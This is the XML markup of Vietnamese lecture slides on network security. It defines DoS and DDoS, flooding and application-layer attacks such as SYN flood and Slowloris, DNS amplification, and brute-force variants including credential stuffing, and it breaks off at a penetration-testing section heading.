          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" spc="-20" dirty="0"/>
              <a:t>2.4.2. Phân biệt DoS và DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{186E1AAF-ADBA-9F4E-7FAF-8B9ADC518DE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61</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07DA2643-9882-645E-BBD3-5DE53FD5E743}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1353076"/>
            <a:ext cx="8915400" cy="343940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DoS (Denial of Service): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thông thường chỉ từ một kết nối hoặc một máy tính. Quy mô nhỏ, dễ xác định và ngăn chặn hơn.</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DDoS (Distributed Denial of Service): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Liên quan đến nhiều hệ thống máy tính phân tán (Botnet). Quy mô lớn, tạo ra lượng giao thông khổng lồ, khó phát hiện và chặn hơn.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2260270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125F-DDC1-C65E-8BF6-C8A0CA8A503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E6CCD30-90F0-7E28-6B7C-69E6D2E2FDA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7E615572-D8E7-C466-910B-F59D276743AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>. Các dạng tấn công theo lớp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDC237D9-8CDD-4741-5862-FB52C052DE5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62</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C31382E0-ABB8-2CDC-83D0-1B2ABD7A5310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1059181"/>
            <a:ext cx="8915400" cy="251607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Tấn công Flooding (Volumetric Attacks): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Mục tiêu là tiêu thụ hết băng thông hoặc tài nguyên mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</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 Phương pháp: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UDP Flood, ICMP Flood, SYN Flood (gửi liên tục gói tin SYN mà không hoàn thành bắt tay TCP, làm tiêu hao tài nguyên kết nối).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3420703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7849B-9B72-FA5E-115D-E631769C425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881A622-B928-1606-063C-3F2926A24E8C}"/>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AC45ECE4-8A6D-0C67-29D9-5FAF5891EE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>. Các dạng tấn công theo lớp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6C84286-7ABA-4A88-4B27-FB182CF1098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63</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80784449-B92E-C652-A24A-99918EF00F4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1059181"/>
            <a:ext cx="8915400" cy="297773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Tấn công 7 tầng (Application Layer Attacks):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Mục tiêu là bắt máy chủ xử lý các yêu cầu phức tạp (tiêu thụ CPU, RAM).</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Phương pháp: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>HTTP Flood, Slowloris (gửi header HTTP rất chậm để giữ kết nối HTTP mở, làm giảm số lượng kết nối tối đa của Webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="725374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29AFE-C450-273D-A4FA-50091B6B3E2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5B373C8-EF24-064C-B385-D936EA0B5DD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CDC54542-A2BC-0DCD-D17E-9218D0AEB216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>. Các dạng tấn công theo lớp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66BF595-7D61-8F9A-E71C-7AD24305B6D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64</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F386AB4-FDBF-8C60-5A77-658545699AEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1059181"/>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Tấn công Reflection và Amplification: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sử dụng các dịch vụ hợp pháp của bên thứ ba để tăng cường khả năng tấn công và che giấu nguồn gốc.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Ví dụ: Tăng cường DNS (DNS Amplification).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397397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5C35A-A3CC-BDEA-BEA8-087D61A67F2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605E1DB-94C1-B15C-50AD-D0255A0531B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6EA10311-E21C-ABD8-F5F1-BC549CF1DA01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>. Tấn công dò mật khẩu (Brute-Force Attack)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>.1. Cơ chế hoạt động và các biến th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>ể</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8015F22-B4E3-30D4-D66F-535CED05A658}"/>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65</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA805DFD-3102-8800-81C1-C29814335CEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259492" y="2734174"/>
            <a:ext cx="8915400" cy="2977737"/>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Định nghĩa: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kỹ thuật tấn công hệ thống hóa việc thử tất cả các tổ hợp ký tự có thể có để đoán một chuỗi khóa bí mật (mật khẩu).</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Mục tiêu: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Truy cập trái phép vào các tài khoản nhạy cảm; Thỏa hiệp dữ liệu; Gây Từ chối Dịch vụ (DoS) cục bộ do quá tải Webserver.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1121530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69DBE-3183-9404-9B3B-E5DBAE3B4DF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3550319-9EC5-960E-5394-D96E09A7ABC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5B858AD9-CE69-CA51-8963-B7F05B4AC336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>.1. Cơ chế hoạt động và các biến th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>ể</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ADBE524-2AA2-2A2F-ED24-069992FAC62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66</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6131BAB2-4131-8DFA-0E7C-3F68B81777A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1572186"/>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Cơ chế: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Dựa trên nguyên lý cạn kiệt không gian khóa. Công cụ tự động hóa gửi yêu cầu HTTP/S với các cặp thông tin đăng nhập và kiểm tra phản hồi của server (ví dụ: 200 OK hoặc 302 Found).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1596040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9A1E5-3B68-9078-7DC2-CA31BEA3664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D5D01F2-AB93-DE68-26A6-F3F49EA51AF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D0B53AFC-E613-F457-2D02-BDCEF2516CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>. Các loại hình tấn công phổ biến:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CAD9F9D-5C8B-0E35-4781-1215A5BCEE9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67</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98CD1CC6-2B5C-ECB5-59B1-F4CEFF34585D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1572186"/>
            <a:ext cx="8915400" cy="41062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Dictionary Attack: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sử dụng tệp từ điển chứa các mật khẩu phổ biến hoặc đã bị rò rỉ.</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 Simple Brute-Force: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thử tất cả các tổ hợp ký tự có thể trong một bộ ký tự và độ dài nhất định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Credential Stuffing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sử dụng các cặp thông tin đăng nhập đã bị đánh cắp từ các vụ rò rỉ dữ liệu khác.</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Reverse Brute-Force: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tìm kiếm nhiều tài khoản có cùng một mật khẩu yếu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3422522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6D330-457A-B074-7437-FB55CE5015F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B70060B-FD6D-3C6C-1A9E-31944E862198}"/>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3851FD86-ED29-A78A-881E-30BE8407F7DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> THỰC HÀNH VÀ ĐÁNH GIÁ BẢOMẬT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3.1	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Giới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Xâm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhập</a:t>
            </a:r>
